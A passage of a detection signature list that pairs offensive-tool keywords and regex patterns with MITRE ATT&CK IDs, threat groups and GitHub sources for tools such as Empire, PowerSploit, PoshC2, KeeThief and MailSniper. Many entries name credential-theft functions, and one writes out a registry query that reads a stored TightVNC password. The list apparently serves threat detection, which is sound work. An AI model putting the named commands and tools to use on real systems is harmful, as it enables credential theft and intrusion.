can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-ExploitableUnquotedPath*",".{0,1000}Get\-ExploitableUnquotedPath.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-FakeServiceUsers*",".{0,1000}Get\-FakeServiceUsers.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*Get-FileContentsWMImplant*",".{0,1000}Get\-FileContentsWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Get-FireFoxHistory*",".{0,1000}Get\-FireFoxHistory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-FoxDump*",".{0,1000}Get\-FoxDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetFullPrivsClient.exe*",".{0,1000}GetFullPrivsClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*GetFullPrivsDrv_x64.sys*",".{0,1000}GetFullPrivsDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*Get-GPOEnum*",".{0,1000}Get\-GPOEnum.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-GPOsPerOU*",".{0,1000}Get\-GPOsPerOU.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-GPOtoFile*",".{0,1000}Get\-GPOtoFile.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*getgppgroups *",".{0,1000}getgppgroups\s\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-GPPInnerFields*",".{0,1000}Get\-GPPInnerFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getgpppassword *",".{0,1000}getgpppassword\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-GPPPassword -*",".{0,1000}Get\-GPPPassword\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Get-GPPPassword*",".{0,1000}Get\-GPPPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-GPPPassword*",".{0,1000}Get\-GPPPassword.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-GPPPassword.*",".{0,1000}Get\-GPPPassword\..{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-GPPPassword.json*",".{0,1000}Get\-GPPPassword\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Get-GPPPassword.ps1*",".{0,1000}Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1124","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-GPPPassword.py*",".{0,1000}Get\-GPPPassword\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Get-GraphTokens*",".{0,1000}Get\-GraphTokens.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Authenticate as a user to Microsoft Graph","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Get-GroupMembers -GroupName ""Account Operators""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Account\sOperators\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Get-GroupMembers -GroupName ""Domain Admins""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Domain\sAdmins\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Get-GroupMembers -GroupName ""Enterprise Admins""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Enterprise\sAdmins\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Get-GroupMembers -GroupName ""Server Operators""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Server\sOperators\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Get-HeadersWithPrtCookies*",".{0,1000}Get\-HeadersWithPrtCookies.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*GetHijackableDllName*",".{0,1000}GetHijackableDllName.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*Get-ImageNtHeaders*",".{0,1000}Get\-ImageNtHeaders.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1103","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-implantworkingdirectory*",".{0,1000}get\-implantworkingdirectory.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-InactiveDomainAdmins*",".{0,1000}Get\-InactiveDomainAdmins.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*Get-InternetExplorerBookmarks*",".{0,1000}Get\-InternetExplorerBookmarks.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-InternetExplorerHistory*",".{0,1000}Get\-InternetExplorerHistory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ItemProperty -Path HKLM:\Software\TightVNC\Server -Name *Password* | select -ExpandProperty Password*",".{0,1000}Get\-ItemProperty\s\-Path\sHKLM\:\\Software\\TightVNC\\Server\s\-Name\s.{0,1000}Password.{0,1000}\s\|\sselect\s\-ExpandProperty\sPassword.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","TightVNC password (convert to Hex then decrypt with e.g.: https://github.com/frizb/PasswordDecrypts)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name *RunAsPPL*",".{0,1000}Get\-ItemProperty\s\-Path\sHKLM\:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\s\-Name\s.{0,1000}RunAsPPL.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Sometimes LSASS is configured to run as a protected process (PPL). You can query this with PowerShell as follows.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-KeePassConfigTrigger*",".{0,1000}Get\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*Get-KeePassDatabaseKey*",".{0,1000}Get\-KeePassDatabaseKey.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an 